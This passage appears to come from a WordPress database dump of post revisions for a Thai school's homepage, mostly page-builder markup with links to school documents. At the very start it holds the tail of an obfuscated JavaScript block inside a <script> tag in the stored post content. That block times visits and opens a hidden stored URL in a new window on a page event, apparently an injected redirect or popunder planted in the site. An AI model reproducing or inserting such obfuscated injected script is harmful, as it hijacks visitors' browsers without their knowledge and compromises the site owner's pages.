Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 10:35:55','2024-08-29 03:35:55','',19,'http://watprato.ssk.in.th/?p=257',0,'revision','',0),
(259,2,'2024-08-29 10:38:37','2024-08-29 03:38:37','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button 